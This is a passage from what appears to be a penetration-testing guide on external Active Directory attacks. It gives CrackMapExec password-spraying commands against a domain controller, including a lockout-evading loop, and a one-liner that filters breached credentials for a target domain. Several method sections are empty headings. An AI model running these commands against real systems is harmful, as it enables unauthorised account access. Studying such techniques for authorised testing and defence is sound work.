Non-Authenticated (External) Attacks

Password Spraying

Requirements: User list, common passwords, understanding of domain lockout policy

Password Spraying Execution

# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success

# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
    crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
    sleep 1800  # 30-minute delay between password attempts
done

Credential Stuffing

Requirements: Breach credential data matching target organization, network access to domain services

Credential Preparation

# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txt

Credential Stuffing Execution

CrackMapExec Method

Metasploit Method


Brute Force Attacks

Requirements: Target administrative accounts, comprehensive password lists, understanding of lockout policies

Targeted Brute Force

CrackMapExec Method

Impacket Method

Last updated

Was this helpful?